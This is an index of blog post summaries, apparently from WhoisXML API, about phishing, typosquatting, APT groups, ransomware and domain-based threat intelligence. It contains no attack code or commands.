Two cyber threats recently caught the attention of WhoisXML API researchers, primarily since parts of their infection chain hide behind legitimate services. This tactic is tricky for security teams because blocking the domains involved means blocking legitimate applications, too. more
Cyber attackers typically use newly registered domains (NRDs) in their campaigns to evade detection, particularly since the implementation of privacy protection in WHOIS records. But some also use aged domains like the SolarWinds hackers to render a sense of legitimacy to their pages. more
Phishing emails impersonating Maersk, one of the largest container shipping companies, targeted more than 18,000 people since the beginning of the year. The email address imitated the legitimate company’s email address but led to a phishing page designed to look like Maersk’s shipping portal login page. more
Premium Short Message Service (SMS) abuse is no longer new. But it's pretty rare for such threats to rack up hundreds of dollars in additional phone bill costs for every victim each year. more
Threat actors don't rest. Their malicious campaigns operate 24/7, especially when special occasions are approaching. Last May, we discovered over a thousand web properties related to Mother's Day, many of which either hosted questionable content or have been flagged as malicious. more
In an earlier post, we looked at how cybersquatters took advantage of the popularity of seven car manufacturers to lure unwitting victims to fake sites. Since then, we were alerted to a phishing campaign this time targeting several German car dealers via age-old but still effective phishing. more
In the past, security experts typically made a distinction between a cybercrime and an advanced persistent threat (APT). While cybercrime focused on obtaining financial gain, APTs trailed their sights on specific organizations, often to steal nation-state secrets. more
AliExpress is among the most visited business-to-customer (B2C) e-commerce sites globally, with millions of visitors daily. Therefore, a recent cybersquatting campaign targeting the platform could lure many victims into buying counterfeit products, divulging their login credentials, downloading malware, and many other actions that could jeopardize their data and devices. more
When Facebook changed its parent company name to Meta in October 2021, we detected more than 5,500 newly registered domains (NRDs) a week after the announcement. In more recent news, a judge dismissed the company's cybersquatting and trademark infringement case against Namecheap. more
There's a new phishing-as-a-service (PaaS) solution in town, and it's called "Frappo." This new phishing toolkit enabled threat actors to launch impersonation attacks on at least 19 companies in the financial, entertainment, and telecommunications industries. more
Twitter was recently abuzz with news regarding an ongoing Cardano scam via a downloadable phishing app. Posing as a giveaway promo, which is how cybercriminals have frequently been victimzing cryptocurrency owners these days, users who get tricked into downloading the rogue app end up with stolen credentials instead. more
Non-fungible token (NFT) companies like Dapper Labs and Yuga Labs were recently seen performing defensive domain registration. While this strategy is only a part of a broader brand protection program, large companies in other industries implement it as well. more
Threat actors the world over have long been employing website defacement as a tactic to further their political, environmental, or even personal agenda. They essentially replace the content of target sites to display their messages through various means, including SQL injection, cross-site scripting (XSS), and other initial compromise techniques. more
Fake news and disinformation have been significant issues for some time now, even urging the U.S. government to push back against proliferators who, some opine, do the malicious deed for political or financial gain. Amid this scenario, many have begun doubting what's real and what's not on the Web not just in the U.S. but worldwide. more
The Internet has been abuzz with talks about Elon Musk buying Twitter since he made an initial offer of US$44 billion on 14 April 2022. The even bigger news? Twitter accepted the offer despite some employees' qualms about Musk's future plans for the company. more
The NSO Group has been known for targeting dissident journalists and bloggers notably with its proprietary spyware Pegasus. In November 2021, for instance, Apple sued the NSO Group for its alleged surveillance and targeting of its device users. more
Sinkholing has long been employed as an effective cybersecurity solution to curb the spread of dangerous malware. Remember the infamous WannaCry ransomware outbreak in 2019? Security teams put a stop to the threat through sinkholing. more
We're supposed to spoil our mothers on Mothers' Day, but with various scams out there, you may end up losing money or with a malware-infected device. WhoisXML API researchers found more than a thousand digital properties that could be used in Mothers' Day scams. more
On 9 March 2022, the Cybersecurity and Infrastructure Security Agency (CISA) added 98 indicators of compromise (IoCs) to their Conti ransomware alert page. WhoisXML API researchers examined these flagged domain names for recurring characteristics to uncover more artifacts. more
HermeticWiper, also known as "IsaacWiper" or "Sandworm," which wipes the data on computers, rendering them useless, has reportedly affected hundreds of Ukrainian users since it surfaced. While a few cybersecurity specialists have publicized indicators of compromise (IoCs) related to the ongoing campaigns, we found more connected web properties that users may need to steer clear of to avoid becoming the next victims. more
Operation Dream Job, a malicious group first seen in 2020, involves threat actors spoofing job hunting sites to lure people. It resurfaced in February 2022, this time exploiting a zero-day vulnerability in Google Chrome more than a month before the flaw was detected and a patch was made available. more
APT36 or Earth Karkaddan is an advanced persistent threat (APT) actor group targeting various government entities, most especially those based in India. The web properties they use for campaigns include only a few domains and IP addresses along with related malware hashes as indicators of compromise (IoCs). more
The International Committee of the Red Cross (ICRC) hack in January 2022 led to the compromise of the sensitive information belonging to 515,000 people. While no indicators of compromise (IoCs) relevant to the attack have been publicized, a security researcher did expose a possible link to an Iranian misinformation network. more
Cybercriminal network Innovative Marketing made headlines in rogue scareware's heyday. Between its founding in Kyiv, Ukraine, in 2009 and the three years it continued operating, the company reportedly amassed close to US$700 million in revenue. more
In addition to batch data feeds, real-time APIs, and web-based GUIs, WhoisXML API now delivers domain intelligence through data streaming. With the new delivery model, the company provides the data to users as soon as they are made available and processed at an interval of 1 hour or less. more
The U.S. tax season began when the Internal Revenue Service (IRS) started accepting and processing 2021 tax returns on 24 January 2022. The deadline is set for 18 April 2022, and taxpayers expect to receive email notifications regarding penalties, refunds, and other tax-related issues more
Distinguishing properties added by the companies themselves is an essential part of this study. If the legitimate company owns the domains and subdomains, they have control over these assets. Otherwise, the digital properties can be considered rogue that can be potentially used in brand abuse, phishing campaigns, and other malicious activities. more
It's not unusual for movies, actors, and actresses to serve as lures in cyber attacks. Our recent post on "Spider-Man: No Way Home" proved that. Phishers and other threat actors will, unfortunately, try to capitalize on anything that's bound to get a lot of user attention. And the annual Oscar Awards is no stranger to such a scenario. Just last year, in fact, hackers used nominated films as phishing baits. This year may be no different. more
Checkpoint researchers identified DHL as the most-imitated brand in phishing campaigns at the end of 2021. We sought to find if that will remain the case this year by looking at various intelligence sources. more
Threat actors have notoriously taken advantage of the Olympic Games's popularity to launch malicious campaigns. The "OlympicDestroyer" malware was most notable, using a domain related to the Pyeongchang 2018 Winter Olympics. But the COVID -- 19 bubble in the 2022 Olympic Winter Games may have increased the danger. more
Romance-themed malicious campaigns are launched throughout the year, but days leading up to Valentine’s Day could be particularly timely for such activities. more
Many countries celebrate Data Privacy Awareness Week every last week of January. Each year, the National Cyber Security Alliance (NCSA) makes it a point to remind users about the importance of keeping their digital data safe from all kinds of threat actors. In fact, they commemorated this year's Data Privacy Awareness Week with various events. more
BlackTech, an APT group known for cyber espionage activities targeting Asia, was recently detected using a new malware called “FlagPro.” NTT Security named some indicators of compromise (IoC) related to the new campaign, including five IP addresses and two subdomains. more
Ransomware has been one of the biggest threats to Internet users the world over since the malware first surfaced. REvil was one of the most notorious ransomware variants of 2021, pushing the U.S. Department of State to offer a US$10 million reward to anyone who can name and locate REvil gang leaders and up to US$5 million for any of their affiliates in November. more
Non-fungible token (NFT) scams can come in various forms, but one thing is sure: the threat actors behind them often use domain names, fake websites, and phishing emails. more
Given the dangers that COVID-19 poses to people's health and the emergence of new variants every so often, it's easy to see why avid moviegoers would resort to streaming instead. But while they may indeed be avoiding the disease, their attempts to download pirated movies is not only illegal -- it could put their computers at risk. more
Zloader, a banking malware that steals sensitive user data, is back with a more sophisticated infection chain. It evades detection while exploiting Microsoft's digital signature verification method. more
Giving gifts the whole year round is normal, but a whole boatload of presents are bought and sold most especially during Christmas and holiday seasons. The end-of-year holidays, unfortunately, also usher in the greatest number of gift card scams. But the world's biggest brands are no longer newbies to the threat, which is why Amazon, iTunes, and Target, among many others, have put up pages where scam victims can report malicious sites and pages. more
A zero-day vulnerability found in Log4j, a logging library commonly used in Java, was detected on 9 December 2021. The vulnerability known as "CVE -- 2021 -- 44228" or "Log4Shell" enables attackers to execute codes and access all data on an infected machine remotely. more
Threat actors reportedly attacked 29 government agencies worldwide in a recent malicious campaign. The attacks were attributed to China-based advanced persistent threat (APT) group Nickel, which has been known to trail its sights on governments and nongovernmental organizations (NGOs) across Europe, the Americas, and the Caribbean. more
It’s not uncommon to see free web hosting providers get abused as part of phishing campaigns. IBM X-Force Exchange, in fact, published three indicators of compromise (IoCs) related to such an incident. more
The ability to retrieve historical WHOIS information can be essential for the cybersecurity community, particularly when it comes to threat hunting and cybercrime investigation. This investigative capability is highlighted in our latest downloadable white paper "Digging Up Zombie Domains: What WHOIS History Reveals about 3,800+ Verified Phishing Hosts" where we analyzed thousands of verified phishing hosts and their historical WHOIS records. more
The November 2021 PhishLabs Quarterly Threat Trends & Intelligence Report indicated the finance, social media, and telecommunications industries as phishers’ most targeted sectors. Last month, we analyzed a squatting campaign targeting U.S. Bancorp to determine if other banks were at risk, this time we’ll look into the top 3 phishing industry target – telecommunications. more
Locky has been around since 2016, contributing to the total amount lost to ransomware worldwide, which has to this day reached US$20 billion in the U.S. alone. It usually gets delivered to users’ computers via emails with malicious attachments in the form of macro-laden Word documents. more
Facebook CEO Mark Zuckerberg, on 28 October in Connect 2021, introduced Meta, which will be Facebook’s parent company, along with the organization’s various apps and technologies. According to Zuckerberg, "Meta’s focus will be to bring the metaverse to life and help people connect, find communities, and grow businesses." more
A typosquatting campaign targeting U.S. Bancorp was uncovered a few weeks ago, potentially posing a threat to the financial institution and its customers. As of this writing, four domains and their IP resolutions were identified as indicators of compromise (IoCs). more
An ongoing cybersquatting campaign targeting MetLife, a global insurance company, was reported by IBM Exchange X-Force, listing 12 malicious domains. We dug deeper into the campaign as part of our goal to expand lists of indicators of compromise (IoCs). more
Details about an ongoing cybersquatting campaign targeting Turkish Airlines were recently unveiled, naming 13 malicious domains connected to the threat. As one of our primary goals is to expand published lists of indicators of compromise (IoCs), we dug deeper into the campaign to determine if the threat is confined to Turkish Airlines or if other industry players are at risk as well. more
There are several directions an organization can take when naming critical digital properties. A classic tactic is using a common theme, such as pet names, planets, or colors. A CTO suggested naming database nodes after “Game of Thrones (GoT)” characters. Taking this route makes for an obscure naming system that would be difficult for third parties to guess. more
Kaseya, an IT solution developer targeting managed service providers (MSPs) and enterprises, became a victim of a massive ransomware attack last July. While the company’s CEO said that less than 0.1% of its clients were affected, the fact that it mostly served MSPs, the data belonging to as many as 1,500 small businesses could have been compromised. more
According to recent research conducted by DNS Threat Researcher Dancho Danchev, the National Security Agency (NSA) seemingly runs a free VPN domain portfolio to lure malicious users and learn more about their Internet activities. more
It’s not uncommon to see news stories that blame piracy or prerelease leakages for poor movie revenue turnouts. We’ve seen that happen over time with movies like “X-Men: Origins Wolverine,” “Star Wars: Episode III: Revenge of the Sith,” and “Expendables 3.” more
The videogame industry has outperformed the movie and North American sports industry in 2020, and market experts expect the trend to continue on in 2021. So reports about the increasing cyber attacks targeting the said industry is not surprising as threat actors tend to go after lucrative targets. more
The Phorpiex botnet has been operating for years now. It first focused on distributing old-school worms that spread via infected USB drives or through chats that relied on the Internet Relay Chat (IRC) protocol. more
The Hafnium attacks targeting Microsoft Exchange Server vulnerabilities triggered several cybersecurity investigators and researchers to hunt for other threat actors that use similar attack methods. Among them is the Cybereason News Network. more
As an attack vector, phishing has had several underlying purposes – e.g., delivering malware, stealing sensitive information, and defrauding victims. However, it looks like most phishing emails could be used to obtain user credentials according to the 2021 Annual State of Phishing Report by Cofense. more
Conficker gained prominence back in 2008, when it was then considered possibly the most widespread worm affecting millions of Windows computers worldwide. For several years, the worm, also known as "Downup," "Downadup," "Downad," or "Kido," was the top malware infector. more
June 2021 saw the U.S. Department of Justice (DOJ) shutting down and seizing several websites believed to be involved in misinformation campaigns. These websites published news-related content and seemingly had connections to Irani governmental entities. In fact, some of them were found to be the property of the Iranian Islamic Radio and Television Union (IRTVU). more
WhoisXML API recently launched a while-label variant of its Brand Monitor solution so more organizations can offer domain brand protection and marketing services using their own label. more
A recent study of CEO impersonation showed that phishing in its various forms is a threat not just to the world's top companies but also to the top CEOs. more
Domain attack surface discovery is an incessant quest for domain and subdomain names that could be used as attack vectors. The larger its attack surface, the more vulnerable an organization tends to be. On the other hand, the more attack vectors discovered, the higher the chances of mitigating cyber attacks. more
The Domain Research Suite (DRS) has been helping organizations search for relevant domain data and monitor web properties and registrants of interest for years now. To continue to support this effort, a white-label version of DRS is now available to vendors so they can help their own roster of clients improve their brand protection strategies, among other use cases. more
Pride month is celebrated worldwide. While it's meant to be a time of celebration for members of the LGBTQ community and their families and supporters, its popularity has also made it a possible target of cyber threats. In this post, we look at potentially dangerous Internet properties that have been registered both recently and over the years. more
While Office 365 is one of the most prevalent office suites out in the market today, its users can't rest easy. Cybercriminals and threat actors will always find ways to abuse the most popular brands in various ways. more
It has been months after Joe Biden and Kamala Harris took office as president and vice president of the U.S., respectively. And since that time, they were naturally featured in most news outlets. What we wanted to know, though, is how all the attention has been affecting the domain registration world. more
The U.S. government released the Executive Order on Improving the Nation's Cybersecurity in May 2021, highlighting the rationale of a zero-trust security approach. While the order only covers the government's digital infrastructure, this initiative could also serve as a catalyst for more robust global cybersecurity. more
The release of a new application or operating system (OS) is typically greeted by enthusiasm, diverse opinions, and potential threats. Windows 11's case is no different as we identified various assets that could be misused on the Internet. more
Web categorization engines and related tools are built to help organizations classify websites they do business or generally interact with. WhoisXML API's Website Categorization API and Website Categorization Lookup used to classify websites into 25 possible categories. more
Liberty Front Press is a fake news network that has been operating since Trump's administration and was said to be designed to leverage liberal resentment against the former U.S. president while promoting pro-Iranian foreign policy narratives via social media. more
The Pareto botnet, known for using almost a million infected Android devices to spoof people seemingly watching ads on smart TVs, was reportedly taken down recently through the collaboration of industry players, notably Roku and Google. more
The 2016 U.S. elections sparked a lot of controversies, as several law enforcement agents and security researchers believed countries like Russia may have greatly influenced its turnout. We sought to find out more about it via an OSINT analysis using various domain and IP intelligence tools. more
WhoisXML API's repository of historical Domain Name System (DNS) lookup records continues to grow in volume and coverage. The DNS database download service has recently been expanded to now include six types of DNS databases. more
Telecommunications companies are a favored cyberattack target. After all, telcos build, control, and operate critical infrastructure that almost everyone uses to communicate. They also store large amounts of sensitive data that could easily be exploited when falling into the wrong hands. more
Emotet traces its origin as far back as 2014, when its simplest form as a banking Trojan first made the headlines. Over the years, its creators have constantly improved the malware, a popular malware-as-a-service (MaaS) offering in cybercriminal underground fora. more
Content streaming services are no stranger to cyberattacks, and the recent Spotify squatting campaign reported by IBM X-Force Exchange is proof of that. Spotify, however, is not alone on the boat, as many other streaming services have fallen prey to attacks over the years. more
On 14 May 2021, Analyst1 security researchers released a detailed report on the DarkSide cybercriminal gang, which is believed to be responsible for ransomware attacks targeting the Colonial Pipeline. Part of the report was several indicators of compromise (IoCs), specifically 41 malware hashes, two domains, and three IP addresses. more
ZeuS malware traces its origin as far back as 2006, when it was used to steal victims' online banking credentials. In 2011, its source code was leaked on a file-sharing site and quickly spread throughout various underground fora. more
Intranets are by definition meant for internal use only -- employee communication, content management, and the like. They are part of the Deep Web where search engines can't index sites, and unauthorized people shouldn't be able to access them. more
Many reports have released indicators of compromise (IoCs) regarding the Endless Mayfly disinformation campaign. But for those who don't know what it is, Endless Mayfly uses fake social media accounts and media websites to spread false information that has to do with U.S., Israel, and Saudi Arabia relations. more
On any given day, most of us get more emails that we won't read than those that we would. Many of these messages will remain unread and sent to the trash. There comes the third category of emails: Those we wished we hadn't read and acted upon because they are bound to be malicious, sent by cybercriminals trying to lure you into one of their scams. more
Cryptocurrencies keep making waves in the online community, making them prime vehicles of threat actors in scam, phishing, and other malicious campaigns. Fraudsters, for one, have stolen millions of dollars worth of cryptocurrencies from investors through websites that promise rewards, giveaways, and earning opportunities. more
A threat actor reportedly infiltrated the network of and stole data from a financial institution about a month ago by exploiting any of four Microsoft Exchange Server vulnerabilities -- CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, or CVE-2021-27065. While patches for all these have been released, users who have not downloaded and installed these could remain at risk. more
Threats can come from anywhere, even from legitimate hosting infrastructure. In fact, many cybercriminals often host their command-and-control (C&C) servers in known hosting providers' networks, sometimes those that offer bulletproof hosting services, to evade detection and consequent blocking. more
Magecart-style attacks have been around for a while and continue to be mentioned in the news in 2021. We found and collected a list of 20 domain names that have been mentioned in the past months on VirusTotal as Magecart indicators of compromise (IoCs). more
Addressing Domain Name System (DNS) abuse has been a priority of the Internet Corporation for Assigned Names and Numbers (ICANN), notably since March 2020. During its 70th conference, the organization's members talked about creating a web page defining DNS abuse-related terms, which should be updated over time, to help users report cases. more
The accidental leak of Volkswagen's new name that turned out to be an April Fool's prank made headlines. Some were relieved that it was just a marketing stunt, while others cried foul. But those in the field of cybersecurity became more curious. What did the cyber world look like during the supposed leakage until the announcement that it was a prank? more
Typosquatting can enable a variety of cyber threats that include but are not limited to phishing, malware-enabled attacks, and vulnerability exploitation. In a nutshell, the attackers can rely on the technique to mimic legitimate solution and service providers' domains to trick users into thinking they are getting update notifications from their vendors, for example, when they are actually not. more
Did you know that a comprehensive subdomain database can give you 69,383 fully qualified domain names (FQDNs) with the string "firewall," 241,654 FQDNs for "cctv," and 19,048 FQDNs for "scada"? That data can give cybersecurity researchers possible starting points for an article or even a full-blown research paper. more
In the past years, threat actors have made it a point to prey on U.S. taxpayers using phishing emails supposedly from the Internal Revenue Service (IRS). The goal is often to trick victims into giving their login credentials to various platforms. This year is no different. more
On 13 March, IBM X-Force Exchange published nine artifacts -- three domain names and six IP addresses -- related to a squatting campaign targeting JPMorgan Chase and its stakeholders. We dug deeper into the list in hopes of publicizing additional artifacts that users may need to be wary of. more
Kozow[.]com hosts the website of free dynamic Domain Name System (DNS) service provider Dynu Systems. It has been cited for ties to several malicious activities over the past few months. To see if it would be a good idea for organizations to consider blocking the domain from their networks, we collated a list of kozow[.]com subdomains and subjected them to deeper scrutiny. more
Experts often say every cyber threat intelligence team needs a threat intelligence platform, but what is it really and how do you choose the best one for your company? Andreas Sfakianakis, in his recent SANS Institute CTI Summit 2021 talk titled "Excelling at Threat Intelligence Platform Requirements," inspired us to take a deeper look. more
Ramnit stands out as a malware as it continues to evolve and requires cybersecurity experts and law enforcement agents to stay alert. Variants have been recently detected, so that security companies such as Prevailion advise organizations to keep Ramnit on their radar. more
In a recent study INKY subjected around 657 million emails in 2020 and found almost 5 million phishing campaigns, more than 590,000 of which were brand impersonations. It then came up with a list of the top 25 most phished brands in a 2021 report. more
As early as December of last year, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) received reports of several cyber attacks targeting K-12 distance learning institutions. more
A few weeks back, we added unpublicized artifacts to the list of indicators of compromise (IoCs) published by both FireEye and Open Source Context back in December 2020. Some would have thought that would put a stop to the havoc the SolarWinds threat actors have been wreaking, but the group targeted Malwarebytes just recently according to a company report. more
A couple of weeks back, a security researcher alerted his LinkedIn contacts about possibly ongoing targeted attacks stemming from the Iranian subnet 194[.]147[.]140[.]x. He advised cybersecurity specialists to watch out for subnets that may be threatful and consider blocking them. This post encouraged us to look into the subnets and details our findings using IP Netblocks WHOIS Database. more
An enterprise's domain portfolio continues to change as it offers new products and services or withdraw old ones. Mergers, acquisitions, and buyouts would also affect its domain portfolio. Constant monitoring of one's domain portfolio and its related infrastructure is crucial in today's cybersecurity landscape. more
Know-your-customers (KYC) policies aim to minimize the risk of money laundering, bribery, and other types of fraud. While it was originally implemented in financial institutions, companies outside the financial sector have adapted KYC with digital transactions as the primary driver. These days, the approach is enforced by virtual asset dealers, nonprofit organizations, and even social media companies. more
The U.S. Capitol riot on 6 January 2021 was an unexpected event following the 2020 U.S. elections. The incident also made headlines worldwide, prompting us to track the registration trend for Trump-related domains and subdomains. We also looked into two domains for Trump's e-commerce stores that Shopify shut down. more
Blind Eagle is a South American threat actor group believed to be behind APT-C-36 and that has been active since at least 2018. It primarily targets Colombian government institutions and large corporations in the financial, petroleum, and professional manufacturing industries. more
The SolarWinds hack affected several government agencies and tech companies in the U.S. and worldwide. The sophisticated malware attack is believed to have compromised the trusted IT management software as early as March 2020 but only came to light in December. more
Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs), collectively called "intrusion detection and prevention systems (IDPSs)," monitor network traffic to stave off unauthorized access. Roughly speaking, an IDS detects possible malicious network activities, while an IPS stops malicious traffic from entering and possibly damaging a network. more
Why go after individuals when you can get greater rewards by zooming in on more lucrative targets like large multinational corporations (MNCs)? That's the premise behind the Cosmic Lynx business email compromise (BEC) campaign that brought several MNCs, many of which were Fortune 500 or Global 2000 companies, to their knees. more
In October, Brian Krebs reported that several websites related to 8Chan and QAnon went offline, albeit only briefly. That happened when the entity protecting them from distributed denial-of-service (DDoS) attacks, CNServers LLC, terminated its service to hundreds of Spartan Host IP addresses... more
More recently, phishers used a Financial Industry Regulatory Authority (FINRA) look-alike domain in an attempt to breach several of its members' networks. Tasked to oversee 624,000 brokers in the U.S., attacking FINRA's clientele could yield a hefty sum should phishing email recipients fall for the ruse. more
Charming Kitten is a cybercriminal group believed to be of Iranian origin, which was first seen in 2014, but had been active for years after the initial detection. The group use an intricate web of methods such as spear phishing and impersonation. more
Cyber espionage is a type of cyber attack that aims to steal sensitive and often classified information to gain an advantage over a company or government. The 2020 Data Breach Investigations Report (DBIR) revealed that several hundreds of incidents across industries in the previous year were motivated by espionage. more
Targeted attacks are known as some of the most destructive cyber attacks in that they zoom in on organizations that either provide critical services or have massive user bases. more
Not all of the domains that contain a company's brand are under its control. A portion of them - sometimes even the vast majority -- is typically registered by unidentifiable third parties with masked WHOIS records. Arguably, WHOIS redaction might also be preferred by the companies themselves for privacy purposes. But to which extent is this the case? more
The Tor Project has been synonymous with the Deep Web, as it is a primary method by which users can access hidden portions of the Internet. Besides traffic encryption, an additional feature that gives Tor users anonymity is that their network traffic passes through several nodes, making the real source unidentifiable. more
Microsoft is among the most imitated brands globally. Running the company's popular product and service names, such as LinkedIn, Office365, and Windows, on a subdomains lookup tool, we uncovered 7,900 related subdomains. more
Elections and other events related to the government typically drive a great amount of Internet activity. Considering the domain name space, we found 4,197 subdomains related to the U.S. elections and the government in general. more
The attack surface of every Internet user gets wider every day, but it doesn't mean there's nothing that can be done about it. For one, analyzing possible attack vectors, such as suspicious or malicious domain names and IP addresses, can help with attack surface management. more
Cybercrime is first and foremost financially motivated. Cybercriminals look for lucrative targets, including social media networks with hundreds of millions of monthly active users. We put this perspective to the test by analyzing the domain attack surface of three of today's largest social media platforms. more
Just as no man is an island, no company can perform core functions without other organizations' help. This fact is highlighted in today's age of outsourcing, partnership, and third-party connections. Unfortunately, threat actors have also found a massive opportunity in these relationships. more
Almost every transaction on the Internet is riddled with risks, and the use of online payment processing platforms is no exception. With more people opting to transact online and use digital wallets, threat actors have much to gain by targeting online payment processing platforms. more
Every organization faces two kinds of cyber threats daily - "known" and "unknown" ones. Known threats are those that security experts have discovered, often published in blogs and major news outfits with accompanying indicators of compromise (IoCs). Unknown threats, meanwhile, are those that remain hidden to victims and researchers. IoCs for these have yet to be identified and disclosed. more
Most businesses rely on third-party entities to outsource certain functions, save on costs, and strengthen their cybersecurity capabilities. While working with external providers makes perfect business sense, it also poses cyber risks. more
Threat actors usually ride on a brand's popularity to make phishing campaigns believable. A common approach involves registering typosquatting domains that closely resemble those of the legitimate owners. Yet monitoring typosquatting domains may just be the tip of the iceberg in the fight against phishing. more
Phishing attacks' success can be partially attributed to threat actors' use of branded domain names, including both legitimate and misspelled variants. It's no wonder, therefore, that blacklisting sites like PhishTank provide users a way to search phishing URLs by target brand. more
Virtual private networks (VPNs) are widespread; about a third of the Internet population uses them worldwide. Their primary reason? VPN usage touts more secure browsing. more
Dridex, Trickbot, and Emotet are banking Trojans that have enabled cybercrime groups to steal hundreds of millions of dollars from their victims. These malware have evolved over the years, and just recently, Emotet was seen using stolen attachments to make their spam emails more credible. more
The world continues to produce and consume digital content at an increasingly fast pace across channels - making risk exposure continuously greater in the process. To tackle this problem, digital risk protection allows organizations to address digital risk factors and monitor and reduce their attack surface. more
Threat actors are seasoned posers. They often pose as bank employees, police officers, or court officials. A coronavirus-themed campaign even had them posing as the Director-General of the World Health Organization (WHO). Insurance companies are also increasingly targeted, which can be attributed to the ongoing global health crisis. more
In 2018, the biggest scam that banked on the Black Lives Matter movement was exposed. An Australian National Union Workers official named Ian Mackay was allegedly behind the Black Lives Matter Facebook page that garnered more than 700,000 followers and racked over US$100,000 in donations. more
Disposable email addresses are quite widespread and for different reasons. Some people believe that using throwaway or temporary email addresses helps them protect their privacy. Others, however, use these in more questionable endeavors - hence the relevance of monitoring disposable email domains. more
Domain generation algorithm (DGA) is used to generate several domain names commonly used for command-and-control (C&C) servers in malware attacks. The logic behind a domain name generation algorithm is quite simple. Instead of hard-coding the domain or IP address into the malware, the malware finds its C&C under a domain with a seemingly random name. more
Threat actors are always on the lookout for potential ways into target networks. And although the cybersecurity world has a lot on its radar already, subdomains are entry points that are not always easy to identify and may end up overlooked. more
Cyber attacks can come from practically any angle, and more often than not, it's hard to see them coming without knowing all there is to know about a domain's WHOIS history and connected domain entities. Several aspects come into play in this scenario, one of which is old and forgotten pages on a website. more
People may not yet be keen on going to movie theaters due to COVID-19. As such, drive-in movie theaters have become more prominent as these help implement social distancing measures. more
Kanye West trended after he announced his plan to run for U.S. president on 4 July 2020. On Twitter, his announcement was liked over 1.1 million times and retweeted more than 500,000 times. Elon Musk was also quick to express his support. more
Captain America arrived on Fortnite in time for the 4th of July celebration. This announcement was big news to the gaming community, with search terms such as "fortnite captain america skin" and "fortnite captain america" significantly rising in popularity on Google in the past week. more
The U.S. Independence Day comes with both fireworks and the best deals. On this holiday, retailers usually offer big discounts. At this time when people may opt to shop online, several publications like TechRadar and Business Insider even curated a list of 4th of July deals from different retailers. more
A bulk whois lookup of domain names similar to the official website of the Florida Statewide Medicaid Managed Care (SMMC) Program -- www[.]flmedicaidmanagedcare[.]com -- indicates that a typosquatting event, or a cybersquatting one at the very least, might be at play. more
Even as the world continues to tackle the coronavirus pandemic, essential events just can't be delayed. The U.S. presidential elections will continue to take place on 3 November 2020. more
George Floyd passing away while being arrested in Minneapolis, Minnesota, sparked several Black Lives Matter (BLM) protests worldwide. The protests started on 26 May, a day after Floyd's death, spanning states and even countries within a few days. more
Back in 2018, investigative journalist Brian Krebs warned against the nuances of internationalized domain names (IDNs). These domains, which contain non-Latin characters but appear to do so, can be used to create visual confusions that can become particularly handy in executing credible punycode phishing campaigns. more
Microsoft is among the top technology companies globally and so is in critical need of brand protection. The company name already figured in many phishing campaigns, including Microsoft Office 365 that has been abused several times in business email compromise (BEC) scams. more
Typosquatting are among the cybersecurity threats that deserve a closer look in the financial sector. In fact, the early detection of typosquatting domains can help financial institutions maneuver away from cyber risks that could cause much damage. But to what extent is this the case? more
PayPal is still one of the most imitated brands on the Internet. From 1-8 June 2020, the Typosquatting Data Feed detected a total of 64 PayPal lookalike domains. more
On 29 April 2020, IBM X-Force warned users of an AppleID typosquatting campaign specifically targeting members of the media sector. We sought to dig deeper into these threats and find other relevant domains and IP addresses that users, regardless of industry, may need to steer clear of. more
On Instagram's Help Center, there are sections solely dedicated to Intellectual Property. The social media giant also provided avenues for reporting account impersonation and trademark violations. more
In 2019, Credit Suisse was hit by a spying scandal that quickly spiraled into several things - a public confrontation, a resignation, and a death. Iqbal Khan, the bank's former head of wealth management, confronted a private investigator on the streets on 17 September after noticing that someone was following him. more
Cybercrime is borderless. Just like marketing teams use location-based targeting to create a deeper connection with customers through content personalization, cybercriminals adjust their attacks to exploit their victims' fears. more
Analysts and researchers have advised to be wary of newly registered domains (NRDs) for several years. Back in 2019, it was even suggested that 70% of new domain registrations are malicious. We keep identifying many suspicious newly registered domains in our Newly Registered & Just Expired Domains database even today, many of which are related to current world events such as the spread of COVID-19. more
Amid the spread of COVID-19, the world continues to suffer dire health and economic consequences. To help, national governments have released funds to support companies and laid-off employees. more
As the coronavirus infection toll continues to rise, many countries are scrambling to get their hands on medical-grade N95 face masks. A commodity that once only served a purpose in specialized sectors such as healthcare has become a premium product demanded by the public. more
COVID-19 caught everyone by surprise. No one thought a virus could inflict so much damage to the global economy, but it has. As thousands of businesses closed shop and millions of employees lost their jobs, governments and international organizations alike sought to provide financial assistance to the severely affected. more
The rapid spread of COVID-19 had people scrambling to protect themselves. Among different means of protection, besides imposed community quarantines and social-distancing measures, it has been widely recommended to purchase reliable surgical masks and respirators. Mass demand for such products quickly led to a shortage in different parts of the world. more
As a huge chunk of the world's population is staying at home because of social distancing measures, video-conferencing businesses saw an opportunity to expand their freemium offers. more
A lot of thinking and energy often goes into finding the "best" Internet domain name for a new brand, product, or service. So, isn't it wonderful when the perfect match turns out to be available right away for purchase with any big registrar? more
Cybercriminals know no boundaries. While the world battles the COVID-19 pandemic, threat actors continue to attack businesses that may already be suffering from operational setbacks. more
Spear-phishing email attacks pose a significant challenge to most organizations. A successful attempt can cost a company an average of US$1.6 million per incident. more
Targeted attacks are considered insidious digital threats as they may lead to debilitating data breaches with substantial financial repercussions. Apart from money lost to theft, victims may shed even more resources as they face expensive lawsuits, hefty fines, and settlements for failing to comply with data privacy regulations in addition to reputational damage. more
Having crossed the two-million mark in coronavirus infections worldwide, citizens from all nations are facing a difficult time. Sadly, cyber threats and attacks currently spreading online are making the situation worse. more
The world has been on edge for the past weeks as many nations enforced mass quarantines amid the continued rise in the number of Coronavirus-infected patients. As a result, about a third of the global population is staying at home to avoid further spread of the virus, and people have been relying on online channels to stay updated. more
If you sometimes lose your temper because a website isn't loading fast enough, you're not alone. Slow websites are not only annoying; the consequences for website owners can also be far-reaching. more
The Domain Name System (DNS) is a crucial element of the Internet and a foundation of networking. Every organization going online uses the DNS. more
As stewards of the Web, Internet infrastructure providers are often held accountable for ensuring the safety of users. Sadly, the recent spate of high-profile security incidents shows that this is not an easy task. more
As cyber-attacks become more robust and sophisticated every day, the world of cybersecurity saw the need to shift. Hence, cyber resilience became the new norm. Cyber resilience bases itself on the fact that cyber risks are no longer just IT risks but also business risks. more
Since time immemorial, entertainment companies always had to contend with content theft. Bootleggers are nothing new in the industry, and their ways have evolved much along with technology. more
Thousands of trademark infringement cases get heard every year -- some of which are more unexpected than others. For instance, let's take a look at one that originates in the world of fiction. Like SpongeBob himself and Patrick, the Krusty Krab has been a centerpiece in the "SpongeBob SquarePants" cartoon series and movies. more
